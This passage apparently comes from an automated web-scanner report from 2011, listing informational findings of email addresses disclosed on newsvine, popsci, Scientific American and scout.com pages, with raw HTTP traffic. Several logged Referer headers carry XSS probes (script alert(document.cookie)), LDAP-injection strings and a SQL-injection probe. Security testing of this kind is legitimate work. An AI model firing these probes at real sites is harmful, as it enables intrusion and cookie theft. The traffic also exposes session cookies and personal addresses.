v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.131. http://www.polls.newsvine.com/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/4103fafbe30ce05a9b8143ffb6b508a6b758dee5.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/?f5644%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E059427e1b2e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:51:51 GMT
ETag: "16e4a40-35a2-49af26d28dbc0"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=478881
Expires: Sat, 05 Feb 2011 01:53:28 GMT
Date: Sun, 30 Jan 2011 12:52:07 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:51:51*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.132. http://www.polls.newsvine.com/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/4e7964f3c7b21be02021b7cd5cf1156e55bce9bf.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; jt_time=1296407787899; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:59:14 GMT
ETag: "2c556e3-3ed3-49af287908080"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=526858
Expires: Sat, 05 Feb 2011 20:16:01 GMT
Date: Sun, 30 Jan 2011 17:55:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 16083

/*v23247: 2011-01-28T17:59:14*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.133. http://www.polls.newsvine.com/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/5e374218b458bef20a9b343255be99bcb1dc1c08.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/?4ad7a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5aa1ea45b3a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:52:22 GMT
ETag: "16e4a62-35a2-49af26f01e180"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=480912
Expires: Sat, 05 Feb 2011 02:24:10 GMT
Date: Sun, 30 Jan 2011 12:48:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:52:22*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.134. http://www.polls.newsvine.com/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/6424485dfa93bc7ba9fe5d9f2e2924a193eab46a.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:52:54 GMT
ETag: "d1f6a3-35a2-49af270ea2980"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 01:17:56 GMT
Date: Sun, 30 Jan 2011 01:17:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:52:54*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.135. http://www.polls.newsvine.com/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/7d448396b677364eb4e464c0a6154d6668c89661.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://openchannel.msnbc.redacted/?52854%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eae378974d45=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:54:17 GMT
ETag: "28396b7-35a2-49af275dca440"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=530390
Expires: Sat, 05 Feb 2011 16:14:15 GMT
Date: Sun, 30 Jan 2011 12:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 13730

/*v23247: 2011-01-28T17:54:17*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.136. http://www.polls.newsvine.com/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js

Issue detail

The following email address was disclosed in the response:

yourname@email.com

Request

GET /_static/js/db9ef5fdd5fb0a36c8e130839bd46dc2a81a597a.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://thelastword.msnbc.redacted/?1406b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2b8d8f3d529=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 29 Jan 2011 01:51:46 GMT
ETag: "16e4a27-63e0-49af26cdc9080"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=479269
Expires: Sat, 05 Feb 2011 01:55:22 GMT
Date: Sun, 30 Jan 2011 12:47:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 25568

/*v23247: 2011-01-28T17:51:46*/
vine.printer.widgets.RawHTMLEditor=function(A,B){vine.printer.widgets.RawHTMLEditor.superclass.constructor.call(this,A,B)};YAHOO.lang.extend(vine.printer.widgets.RawHTM
...[SNIP]...
v=null;this.email_unsubscribe_form=null;this.email_subscribe_form=null;this.enter_email_form=null;this.spinnerDiv=null;this.user_email_value=null;this.email_address_input=null;this.EMAIL_EXAMPLE_TEXT="yourname@email.com";this.loadObjects=function(){this.email_unsubscribe_div=$_F("email_unsubscribe","div",this.div);this.email_subscribe_div=$_F("email_subscribe","div",this.div);this.enter_email_div=$_F("enter_email","d
...[SNIP]...

26.137. http://www.polls.newsvine.com/_vine/js/m1/common.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/m1/common.js

Issue detail

The following email address was disclosed in the response:

newsvinehelp@newsvine.com

Request

GET /_vine/js/m1/common.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://polls.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Fri, 22 Oct 2010 16:50:28 GMT
ETag: "22b0005-8577-493377092dd00"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=470797
Expires: Sat, 05 Feb 2011 01:54:30 GMT
Date: Sun, 30 Jan 2011 15:07:53 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 34167

// GET ELEMENT BY ID
function getElement(id) {
   return document.getElementById(id);
}

// ADD STARTSWITH TO STRING METHODS
String.prototype.startsWith = function(sStart) {
return (this.substr(0,sS
...[SNIP]...
rect.replace('error=', '').trim();
               alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "E4096".\n\nThank you.');
               unsetCommentButtons();
           } else if(!redirect && vinem1.modules.content.comments.commentForm.retries >= 1) {
               alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "Ragamuffin".\n\nThank you.');
               vinem1.modules.content.comments.commentForm.retries = 0;
               unsetCommentButtons();
               var debug = 'subj='+encodeURIC
...[SNIP]...
on.href = redirect;
           }
       } else {
           alert('Apologies, but an error has occurred.\n\nYour comment could not be posted. Please try posting your comment again. If this problem persists, please contact newsvinehelp@newsvine.com and let us know that you received error code: "Spiceweasel".\n\nThank you.');
           vinem1.modules.content.comments.commentForm.retries = 0;
           unsetCommentButtons();

           var debug = 'subj='+encodeURI
...[SNIP]...

26.138. http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/js/msnbc/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /_vine/js/msnbc/s_code.js?v=23247 HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 16 Nov 2010 18:36:50 GMT
ETag: "2200003-448e-4952fd700d480"
Accept-Ranges: bytes
Content-Type: text/javascript
Cache-Control: max-age=520391
Expires: Sat, 05 Feb 2011 01:52:50 GMT
Date: Sun, 30 Jan 2011 01:19:39 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17550

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.139. http://www.polls.newsvine.com/education previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/education

Issue detail

The following email address was disclosed in the response:

museum@cornell.edu

Request

Response

26.140. http://www.polls.newsvine.com/world-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/world-news

Issue detail

The following email address was disclosed in the response:

joshs7778@gmail.com

Request

Response

26.141. http://www.popsci.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popsci.com
Path:	/

Issue detail

The following email address was disclosed in the response:

patrick@taylor.org

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...
with JavaScript 1.0.
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)
Author: Patrick Corcoran
Author Email: patrick@taylor.org
*/

var search_phrase;
var qsParm = new Array();

function parseURLParams(href) {
FORM_DATA = new Object();

...[SNIP]...

26.142. http://www.popsci.com/files/js/ee31ad0468d1381137041de39ea20f10.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popsci.com
Path:	/files/js/ee31ad0468d1381137041de39ea20f10.js

Issue detail

The following email addresses were disclosed in the response:

brian@cherne.net
klaus.hartl@stilbuero.de

Request

GET /files/js/ee31ad0468d1381137041de39ea20f10.js HTTP/1.1
Host: www.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 15:42:59 GMT
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4d D=9067
Content-Type: application/javascript
Content-Language: en
cache-control: max-age = 3600
Date: Sun, 30 Jan 2011 17:16:00 GMT
X-Varnish: 2068982210 2068965888
Via: 1.1 varnish
Connection: close
age: 0
X-Cache: webcache11: HIT 73
Content-Length: 118517

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008-12-0
...[SNIP]...
ion of
* emptying all containers that are used to load content into.
* @type undefined
*
* @name $.ajaxHistory.initialize()
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.ajaxHistory = new function() {

var RESET_EVENT = 'historyReset';

var _currentHash = location.hash;
var _states = {};
var _intervalId = null;
var _observeHistory; // define
...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Implement Ajax driven links in a completely unobtrusive and accessible manner (also known as "Hijax")
* with support for the browser's back/forward navigation buttons and bookmarking.
*

...[SNIP]...
lt value: "remote-".
* @param Function callback A single function that will be executed when the request is complete.
* @type jQuery
*
* @name remote
* @cat Plugins/Remote
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.remote = function(output, settings, callback) {

callback = callback || function() {};
if (typeof settings == 'function') { // shift arguments
callback = settings;
}

...[SNIP]...
current value matches the href attribute of the matched element.
*
* @type jQuery
*
* @name history
* @cat Plugins/History
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.history = function(callback) {
return this.click(function(e) {
// add to history only if true click occured, not a triggered click
if (e.clientX) {
$.a
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
   if (typeof value != 'undefined') { // name and value given, set cookie
       options = options || {};
       if (value === null) {
           value = '';
           option
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

26.143. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The following email addresses were disclosed in the response:

Shop@ScientificAmerican.com
blog@sciam.com

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
<a href="http://www.scientificamerican.com/subscribe/subscribe_mainnav.cfm">Shop@ScientificAmerican.com</a-->
...[SNIP]...
<a href="mailto:blog@sciam.com">blog@sciam.com</a>
...[SNIP]...

26.144. http://www.scientificamerican.com/errors/404.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scientificamerican.com
Path:	/errors/404.cfm

Issue detail

The following email address was disclosed in the response:

Shop@ScientificAmerican.com

Request

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...
<a href="http://www.scientificamerican.com/subscribe/subscribe_mainnav.cfm">Shop@ScientificAmerican.com</a-->
...[SNIP]...

26.145. http://www.scout.com/3/privacy-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/privacy-policy.html

Issue detail

The following email address was disclosed in the response:

Scout.Privacy@fox.com

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...
<a href="mailto:Scout.Privacy@fox.com">Scout.Privacy@fox.com</a>
...[SNIP]...

26.146. http://www.scout.com/3/terms-of-service.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scout.com
Path:	/3/terms-of-service.html

Issue detail
